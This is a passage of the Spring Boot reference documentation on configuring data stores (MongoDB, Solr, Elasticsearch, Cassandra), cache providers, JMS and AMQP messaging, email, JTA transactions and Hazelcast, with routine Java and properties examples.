org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that `City`\nis now a Mongo data class rather than a JPA `@Entity`, it will work in the same way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-mongo-embedded]]\n==== Embedded Mongo\nSpring Boot offers auto-configuration for\nhttps:\/\/github.com\/flapdoodle-oss\/de.flapdoodle.embed.mongo[Embedded Mongo]. To use\nit in your Spring Boot application add a dependency on\n`de.flapdoodle.embed:de.flapdoodle.embed.mongo`.\n\nThe port that Mongo will listen on can be configured using the `spring.data.mongodb.port`\nproperty. To use a randomly allocated free port use a value of zero. The `MongoClient`\ncreated by `MongoAutoConfiguration` will be automatically configured to use the randomly\nallocated port.\n\nIf you have SLF4J on the classpath, output produced by Mongo will be automatically routed\nto a logger named `org.springframework.boot.autoconfigure.mongo.embedded.EmbeddedMongo`.\n\nYou can declare your own `IMongodConfig` and `IRuntimeConfig` beans to take control of the\nMongo instance's configuration and logging routing.\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the\nhttp:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire] data management\nplatform. There is a `spring-boot-starter-data-gemfire` '`Starter POM`' for collecting the\ndependencies in a convenient way. There is currently no auto-configuration support for\nGemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation (`@EnableGemfireRepositories`)].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the Solr 4 client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. There is\na `spring-boot-starter-data-solr` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\nTIP: Solr 5 is currently not supported and the auto-configuration will not be enabled by\na Solr 5 dependency.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nbean. By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elasticsearch] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nthe Elasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. a `TransportClient`) by setting\n`spring.data.elasticsearch.cluster-nodes` to a comma-separated '`host:port`' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-cassandra]]\n=== Cassandra\nhttp:\/\/cassandra.apache.org\/[Cassandra] is an open source, distributed database management\nsystem designed to handle large amounts of data across many commodity servers. Spring Boot\noffers auto-configuration for Cassandra and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-cassandra[Spring Data Cassandra].\nThere is a `spring-boot-starter-data-cassandra` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-cassandra]]\n==== Connecting to Cassandra\nYou can inject an auto-configured `CassandraTemplate` or a Cassandra `Session`\ninstance as you would any other Spring Bean. The `spring.data.cassandra.*` properties\ncan be used to customize the connection. Generally you will to provide `keyspace-name`\nand `contact-points` properties:\n\n[source,properties,indent=0]\n----\n\tspring.data.cassandra.keyspace-name=mykeyspace\n\tspring.data.cassandra.contact-points=cassandrahost1,cassandrahost2\n----\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate CassandraTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(CassandraTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `CassandraTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-cassandra-repositories]]\n==== Spring Data Cassandra repositories\nSpring Data includes basic repository support for Cassandra. Currently this is more\nlimited than the JPA repositories discussed earlier, and will need to annotate finder\nmethods with `@Query`.\n\nTIP: For complete details of Spring Data Cassandra, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/cassandra\/docs\/[reference documentation].\n\n\n\n[[boot-features-caching]]\n== Caching\nThe Spring Framework provides support for transparently adding caching to an application.\nAt its core, the abstraction applies caching to methods, reducing thus the number of\nexecutions based on the information available in the cache. The caching logic is applied\ntransparently, without any interference to the invoker.\n\nNOTE: Check the {spring-reference}\/#cache[relevant section] of the Spring Framework\nreference for more details.\n\nIn a nutshell, adding caching to an operation of your service is as easy as adding the\nrelevant annotation to its method:\n\n[source,java,indent=0]\n----\n\timport javax.cache.annotation.CacheResult;\n\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MathService {\n\n\t\t@CacheResult\n\t\tpublic int computePiDecimal(int i) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nNOTE: You can either use the standard JSR-107 (JCache) annotations or Spring's own\ncaching annotations transparently. We strongly advise you however to not mix and match\nthem.\n\nTIP: It is also possible to {spring-reference}\/#cache-annotations-put[update] or\n{spring-reference}\/#cache-annotations-evict[evict] data from the cache transparently.\n\n\n\n=== Supported cache providers\nThe cache abstraction does not provide an actual store and relies on abstraction\nmaterialized by the `org.springframework.cache.Cache` and\n`org.springframework.cache.CacheManager` interfaces. Spring Boot auto-configures a\nsuitable `CacheManager` according to the implementation as long as the caching support is\nenabled via the `@EnableCaching` annotation.\n\nTIP: Use the `spring-boot-starter-cache` \"`Starter POM`\" to quickly add required caching\ndependencies. If you are adding dependencies manually you should note that certain\nimplementations are only provided by the `spring-context-support` jar.\n\nSpring Boot tries to detect the following providers (in this order):\n\n* <<boot-features-caching-provider-generic,Generic>>\n* <<boot-features-caching-provider-jcache,JCache (JSR-107)>>\n* <<boot-features-caching-provider-ehcache2,EhCache 2.x>>\n* <<boot-features-caching-provider-hazelcast,Hazelcast>>\n* <<boot-features-caching-provider-infinispan,Infinispan>>\n* <<boot-features-caching-provider-redis,Redis>>\n* <<boot-features-caching-provider-guava,Guava>>\n* <<boot-features-caching-provider-simple,Simple>>\n\nIt is also possible to _force_ the cache provider to use via the `spring.cache.type`\nproperty.\n\n\n\n[[boot-features-caching-provider-generic]]\n==== Generic\nGeneric caching is used if the context defines _at least_ one\n`org.springframework.cache.Cache` bean, a `CacheManager` wrapping them is configured.\n\n\n\n[[boot-features-caching-provider-jcache]]\n==== JCache\nJCache is bootstrapped via the presence of a `javax.cache.spi.CachingProvider` on the\nclasspath (i.e. a JSR-107 compliant caching library). It might happen than more that one\nprovider is present, in which case the provider must be explicitly specified. Even if the\nJSR-107 standard does not enforce a standardized way to define the location of the\nconfiguration file, Spring Boot does its best to accommodate with implementation details.\n\n[source,properties,indent=0]\n----\n # Only necessary if more than one provider is present\n\tspring.cache.jcache.provider=com.acme.MyCachingProvider\n\tspring.cache.jcache.config=classpath:acme.xml\n----\n\nNOTE: Since a cache library may offer both a native implementation and JSR-107 support\nSpring Boot will prefer the JSR-107 support so that the same features are available if\nyou switch to a different JSR-107 implementation.\n\nThere are several ways to customize the underlying `javax.cache.cacheManager`:\n\n* Caches can be created on startup via the `spring.cache.cache-names` property. If a custom\n`javax.cache.configuration.Configuration` bean is defined, it is used to customize them.\n* `org.springframework.boot.autoconfigure.cache.JCacheManagerCustomizer` beans are\ninvoked with the reference of the `CacheManager` for full customization.\n\nTIP: If a standard `javax.cache.CacheManager` bean is defined, it is wrapped\nautomatically in a `org.springframework.cache.CacheManager` implementation that the\nabstraction expects. No further customization is applied on it.\n\n\n\n[[boot-features-caching-provider-ehcache2]]\n==== EhCache 2.x\nEhCache 2.x is used if a file named `ehcache.xml` can be found at the root of the\nclasspath. If EhCache 2.x and such file is present it is used to bootstrap the cache\nmanager. An alternate configuration file can be provide a well using:\n\n[source,properties,indent=0]\n----\n\tspring.cache.ehcache.config=classpath:config\/another-config.xml\n----\n\n\n\n[[boot-features-caching-provider-hazelcast]]\n==== Hazelcast\n\nSpring Boot has a <<boot-features-hazelcast,general support for Hazelcast>>. If\na `HazelcastInstance` has been auto-configured, it is automatically wrapped in a\n`CacheManager`.\n\nIf for some reason you need a different `HazelcastInstance` for caching, you can\nrequest Spring Boot to create a separate one that will be only used by the\n`CacheManager`:\n\n[source,properties,indent=0]\n----\n\tspring.cache.hazelcast.config=classpath:config\/my-cache-hazelcast.xml\n----\n\nTIP: If a separate `HazelcastInstance` is created that way, it is not registered\nin the application context.\n\n\n\n[[boot-features-caching-provider-infinispan]]\n==== Infinispan\nInfinispan has no default configuration file location so it must be specified explicitly\n(or the default bootstrap is used).\n\n[source,properties,indent=0]\n----\n\tspring.cache.infinispan.config=infinispan.xml\n----\n\nCaches can be created on startup via the `spring.cache.cache-names` property. If a custom\n`ConfigurationBuilder` bean is defined, it is used to customize them.\n\n\n\n[[boot-features-caching-provider-redis]]\n==== Redis\nIf Redis is available and configured, the `RedisCacheManager` is auto-configured. It is\nalso possible to create additional caches on startup using the `spring.cache.cache-names`\nproperty.\n\n\n\n[[boot-features-caching-provider-guava]]\n==== Guava\nIf Guava is present, a `GuavaCacheManager` is auto-configured. Caches can be created\non startup using the `spring.cache.cache-names` property and customized by one of the\nfollowing (in this order):\n\n1. A cache spec defined by `spring.cache.guava.spec`\n2. A `com.google.common.cache.CacheBuilderSpec` bean is defined\n3. A `com.google.common.cache.CacheBuilder` bean is defined\n\nFor instance, the following configuration creates a `foo` and `bar` caches with a maximum\nsize of 500 and a _time to live_ of 10 minutes\n\n[source,properties,indent=0]\n----\n spring.cache.cache-names=foo,bar\n\tspring.cache.guava.spec=maximumSize=500,expireAfterAccess=600s\n----\n\nBesides, if a `com.google.common.cache.CacheLoader` bean is defined, it is automatically\nassociated to the `GuavaCacheManager`.\n\n\n\n[[boot-features-caching-provider-simple]]\n==== Simple\nIf none of these options worked out, a simple implementation using `ConcurrentHashMap`\nas cache store is configured. This is the default if no caching library is present in\nyour application.\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. Spring AMQP provides a similar feature set for the\n'`Advanced Message Queuing Protocol`' and Spring Boot also provides auto-configuration\noptions for `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging\nnatively in Spring WebSocket and Spring Boot has support for that through starters and a\nsmall amount of auto-configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details). Spring Boot also auto-configures the necessary infrastructure\nto send and receive messages.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`+spring.activemq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee\n{sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-artemis]]\n==== Artemis support\nApache Artemis was formed in 2015 when HornetQ was donated to the Apache Foundation. All\nthe features listed in the <<boot-features-hornetq>> section below can be applied to\nArtemis. Simply replace `+++spring.hornetq.*+++` properties with `+++spring.artemis.*+++`\nand use `spring-boot-starter-artemis` instead of `spring-boot-starter-hornetq`.\n\nNOTE: You should not try and use Artemis and HornetQ and the same time.\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available in the classpath), and `native` to connect\nto a broker using the `netty` transport protocol. When the latter is configured, Spring\nBoot configures a `ConnectionFactory` connecting to a broker running on the local machine\nwith the default settings.\n\nNOTE: If you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`+spring.hornetq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can choose if you want to enable persistence, and the list\nof destinations that should be made available. These can be specified as a comma-separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee\n{sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the '`name`' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-jms-jndi]]\n==== Using a JNDI ConnectionFactory\nIf you are running your application in an Application Server Spring Boot will attempt to\nlocate a JMS `ConnectionFactory` using JNDI. By default the locations `java:\/JmsXA` and\n`java:\/XAConnectionFactory` will be checked. You can use the\n`spring.jms.jndi-name` property if you need to specify an alternative location:\n\n[source,properties,indent=0]\n----\n\tspring.jms.jndi-name=java:\/MyConnectionFactory\n----\n\n\n\n[[boot-features-using-jms-sending]]\n==== Sending a message\nSpring's `JmsTemplate` is auto-configured and you can autowire it directly into your own\nbeans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-javadoc}\/jms\/core\/JmsMessagingTemplate.{dc-ext}[`JmsMessagingTemplate`]\ncan be injected in a similar manner.\n\n\n\n[[boot-features-using-jms-receiving]]\n==== Receiving a message\n\nWhen the JMS infrastructure is present, any bean can be annotated with `@JmsListener` to\ncreate a listener endpoint. If no `JmsListenerContainerFactory` has been defined, a\ndefault one is configured automatically.\n\nThe default factory is transactional by default. If you are running in an infrastructure\nwhere a `JtaTransactionManager` is present, it will be associated to the listener container\nby default. If not, the `sessionTransacted` flag will be enabled. In that latter scenario,\nyou can associate your local data store transaction to the processing of an incoming message\nby adding `@Transactional` on your listener method (or a delegate thereof). This will make\nsure that the incoming message is acknowledged once the local transaction has completed. This\nalso includes sending response messages that have been performed on the same JMS session.\n\nThe following component creates a listener endpoint on the `someQueue` destination:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@JmsListener(destination = \"someQueue\")\n\t\tpublic void processMessage(String content) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nTIP: Check {spring-javadoc}\/jms\/annotation\/EnableJms.{dc-ext}[the Javadoc of `@EnableJms`] for\nmore details.\n\n\n\n[[boot-features-amqp]]\n=== AMQP\nThe Advanced Message Queuing Protocol (AMQP) is a platform-neutral, wire-level protocol\nfor message-oriented middleware. The Spring AMQP project applies core Spring concepts to\nthe development of AMQP-based messaging solutions.\n\n\n\n[[boot-features-rabbitmq]]\n==== RabbitMQ support\nRabbitMQ is a lightweight, reliable, scalable and portable message broker based on the\nAMQP protocol. Spring uses `RabbitMQ` to communicate using the AMQP protocol.\n\nRabbitMQ configuration is controlled by external configuration properties in\n`+spring.rabbitmq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.rabbitmq.host=localhost\n\tspring.rabbitmq.port=5672\n\tspring.rabbitmq.username=admin\n\tspring.rabbitmq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[`RabbitProperties`]\nfor more of the supported options.\n\nTIP: Check http:\/\/spring.io\/blog\/2010\/06\/14\/understanding-amqp-the-protocol-used-by-rabbitmq\/[Understanding AMQP, the protocol used by RabbitMQ]\nfor more details.\n\n\n\n[[boot-features-using-amqp-sending]]\n==== Sending a message\nSpring's `AmqpTemplate` and `AmqpAdmin` are auto-configured and you can autowire them\ndirectly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.amqp.core.AmqpAdmin;\n\timport org.springframework.amqp.core.AmqpTemplate;\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final AmqpAdmin amqpAdmin;\n\t\tprivate final AmqpTemplate amqpTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(AmqpAdmin amqpAdmin, AmqpTemplate amqpTemplate) {\n\t\t\tthis.amqpAdmin = amqpAdmin;\n\t\t\tthis.amqpTemplate = amqpTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-amqp-javadoc}\/rabbit\/core\/RabbitMessagingTemplate.{dc-ext}[`RabbitMessagingTemplate`]\ncan be injected in a similar manner.\n\nAny `org.springframework.amqp.core.Queue` that is defined as a bean will be automatically\nused to declare a corresponding queue on the RabbitMQ instance if necessary.\n\n\n\n[[boot-features-using-amqp-receiving]]\n==== Receiving a message\nWhen the Rabbit infrastructure is present, any bean can be annotated with\n`@RabbitListener` to create a listener endpoint. If no `RabbitListenerContainerFactory`\nhas been defined, a default one is configured automatically.\n\nThe following component creates a listener endpoint on the `someQueue` queue:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@RabbitListener(queues = \"someQueue\")\n\t\tpublic void processMessage(String content) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nTIP: Check {spring-amqp-javadoc}\/rabbit\/annotation\/EnableRabbit.{dc-ext}[the Javadoc of `@EnableRabbit`]\nfor more details.\n\n\n\n[[boot-features-email]]\n== Sending email\nThe Spring Framework provides an easy abstraction for sending email using the\n`JavaMailSender` interface and Spring Boot provides auto-configuration for it as well as\na starter module.\n\nTIP: Check the {spring-reference}\/#mail[reference documentation] for a detailed\nexplanation of how you can use `JavaMailSender`.\n\nIf `spring.mail.host` and the relevant libraries (as defined by\n`spring-boot-starter-mail`) are available, a default `JavaMailSender` is created if none\nexists. The sender can be further customized by configuration items from the `spring.mail`\nnamespace, see the\n{sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[`MailProperties`] for more\ndetails.\n\n\n\n[[boot-features-jta]]\n== Distributed Transactions with JTA\nSpring Boot supports distributed JTA transactions across multiple XA resources using\neither an http:\/\/www.atomikos.com\/[Atomikos] or https:\/\/github.com\/bitronix\/btm[Bitronix]\nembedded transaction manager. JTA transactions are also supported when deploying to a\nsuitable Java EE Application Server.\n\nWhen a JTA environment is detected, Spring's `JtaTransactionManager` will be used to\nmanage transactions. Auto-configured JMS, DataSource and JPA beans will be upgraded to\nsupport XA transactions. You can use standard Spring idioms such as `@Transactional` to\nparticipate in a distributed transaction. If you are within a JTA environment and still\nwant to use local transactions you can set the `spring.jta.enabled` property to `false` to\ndisable the JTA auto-configuration.\n\n\n\n=== Using an Atomikos transaction manager\nAtomikos is a popular open source transaction manager which can be embedded into your\nSpring Boot application. You can use the `spring-boot-starter-jta-atomikos` Starter POM to\npull in the appropriate Atomikos libraries. Spring Boot will auto-configure Atomikos and\nensure that appropriate `depends-on` settings are applied to your Spring beans for correct\nstartup and shutdown ordering.\n\nBy default Atomikos transaction logs will be written to a `transaction-logs` directory in\nyour application home directory (the directory in which your application jar file\nresides). You can customize this directory by setting a `spring.jta.log-dir` property in\nyour `application.properties` file. Properties starting `spring.jta.` can also be used to\ncustomize the Atomikos `UserTransactionServiceImp`. See the\n{dc-spring-boot}\/jta\/atomikos\/AtomikosProperties.{dc-ext}[`AtomikosProperties` Javadoc]\nfor complete details.\n\nNOTE: To ensure that multiple transaction managers can safely coordinate the same\nresource managers, each Atomikos instance must be configured with a unique ID. By default\nthis ID is the IP address of the machine on which Atomikos is running. To ensure\nuniqueness in production, you should configure the `spring.jta.transaction-manager-id`\nproperty with a different value for each instance of your application.\n\n\n\n=== Using a Bitronix transaction manager\nBitronix is another popular open source JTA transaction manager implementation. You can\nuse the `spring-boot-starter-jta-bitronix` starter POM to add the appropriate Bitronix\ndependencies to your project. As with Atomikos, Spring Boot will automatically configure\nBitronix and post-process your beans to ensure that startup and shutdown ordering is\ncorrect.\n\nBy default Bitronix transaction log files (`part1.btm` and `part2.btm`) will be written to\na `transaction-logs` directory in your application home directory. You can customize this\ndirectory by using the `spring.jta.log-dir` property. Properties starting `spring.jta.`\nare also bound to the `bitronix.tm.Configuration` bean, allowing for complete\ncustomization. See the\nhttps:\/\/github.com\/bitronix\/btm\/wiki\/Transaction-manager-configuration[Bitronix documentation]\nfor details.\n\nNOTE: To ensure that multiple transaction managers can safely coordinate the same\nresource managers, each Bitronix instance must be configured with a unique ID. By default\nthis ID is the IP address of the machine on which Bitronix is running. To ensure\nuniqueness in production, you should configure the `spring.jta.transaction-manager-id`\nproperty with a different value for each instance of your application.\n\n\n\n=== Using a Java EE managed transaction manager\nIf you are packaging your Spring Boot application as a `war` or `ear` file and deploying\nit to a Java EE application server, you can use your application servers built-in\ntransaction manager. Spring Boot will attempt to auto-configure a transaction manager by\nlooking at common JNDI locations (`java:comp\/UserTransaction`,\n`java:comp\/TransactionManager` etc). If you are using a transaction service provided by\nyour application server, you will generally also want to ensure that all resources are\nmanaged by the server and exposed over JNDI. Spring Boot will attempt to auto-configure\nJMS by looking for a `ConnectionFactory` at the JNDI path `java:\/JmsXA` or\n`java:\/XAConnectionFactory` and you can use the\n<<boot-features-connecting-to-a-jndi-datasource, `spring.datasource.jndi-name` property>>\nto configure your `DataSource`.\n\n\n\n=== Mixing XA and non-XA JMS connections\nWhen using JTA, the primary JMS `ConnectionFactory` bean will be XA aware and participate\nin distributed transactions. In some situations you might want to process certain JMS\nmessages using a non-XA `ConnectionFactory`. For example, your JMS processing logic might\ntake longer than the XA timeout.\n\nIf you want to use a non-XA `ConnectionFactory` you can inject the\n`nonXaJmsConnectionFactory` bean rather than the `@Primary` `jmsConnectionFactory` bean.\nFor consistency the `jmsConnectionFactory` bean is also provided using the bean alias\n`xaJmsConnectionFactory`.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ Inject the primary (XA aware) ConnectionFactory\n\t@Autowired\n\tprivate ConnectionFactory defaultConnectionFactory;\n\n\t\/\/ Inject the XA aware ConnectionFactory (uses the alias and injects the same as above)\n\t@Autowired\n\t@Qualifier(\"xaJmsConnectionFactory\")\n\tprivate ConnectionFactory xaConnectionFactory;\n\n\t\/\/ Inject the non-XA aware ConnectionFactory\n\t@Autowired\n\t@Qualifier(\"nonXaJmsConnectionFactory\")\n\tprivate ConnectionFactory nonXaConnectionFactory;\n----\n\n\n\n=== Supporting an alternative embedded transaction manager\nThe {sc-spring-boot}\/jta\/XAConnectionFactoryWrapper.{sc-ext}[`XAConnectionFactoryWrapper`]\nand {sc-spring-boot}\/jta\/XADataSourceWrapper.{sc-ext}[`XADataSourceWrapper`] interfaces\ncan be used to support alternative embedded transaction managers. The interfaces are\nresponsible for wrapping `XAConnectionFactory` and `XADataSource` beans and exposing them\nas regular `ConnectionFactory` and `DataSource` beans which will transparently enroll in\nthe distributed transaction. DataSource and JMS auto-configuration will use JTA variants\nas long as you have a `JtaTransactionManager` bean and appropriate XA wrapper beans\nregistered within your `ApplicationContext`.\n\nThe {sc-spring-boot}\/jta\/BitronixXAConnectionFactoryWrapper.{sc-ext}[BitronixXAConnectionFactoryWrapper]\nand {sc-spring-boot}\/jta\/BitronixXADataSourceWrapper.{sc-ext}[BitronixXADataSourceWrapper]\nprovide good examples of how to write XA wrappers.\n\n\n\n[[boot-features-hazelcast]]\n== Hazelcast\n\nIf hazelcast is on the classpath, Spring Boot will auto-configure an `HazelcastInstance`\nthat you can inject in your application. The `HazelcastInstance` is only created if a\nconfiguration is found.\n\nYou can define a `com.hazelcast.config.Config` bean and we'll use that. If your\nconfiguration defines an instance name, we'll try to locate an existing instance rather\nthan creating a new one.\n\nYou could also specify the `hazelcast.xml` configuration file to use via configuration:\n\n[source,properties,indent=0]\n----\n\tspring.hazelcast.config=classpath:config\/my-hazelcast.xml\n----\n\nOtherwise, Spring Boot tries to find the Hazelcast configuration from the default\nlocations, that is `hazelcast.xml` in the working directory or at the root of the\nclasspath. We also check if the `hazelcast.config` system property is set. Check the\nhttp:\/\/docs.hazelcast.org\/docs\/latest\/manual\/html-single\/[Hazelcast documentation] for\nmore details.\n\nNOTE: Spring Boot also has an\n<<boot-features-caching-provider-hazelcast,explicit caching support for Hazelcast>>. The\n`HazelcastInstance` is automatically wrapped in a `CacheManager` implementation if\ncaching is enabled.\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP etc. If Spring Integration is available on your classpath it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if `'spring-integration-jmx'` is also on the classpath. See 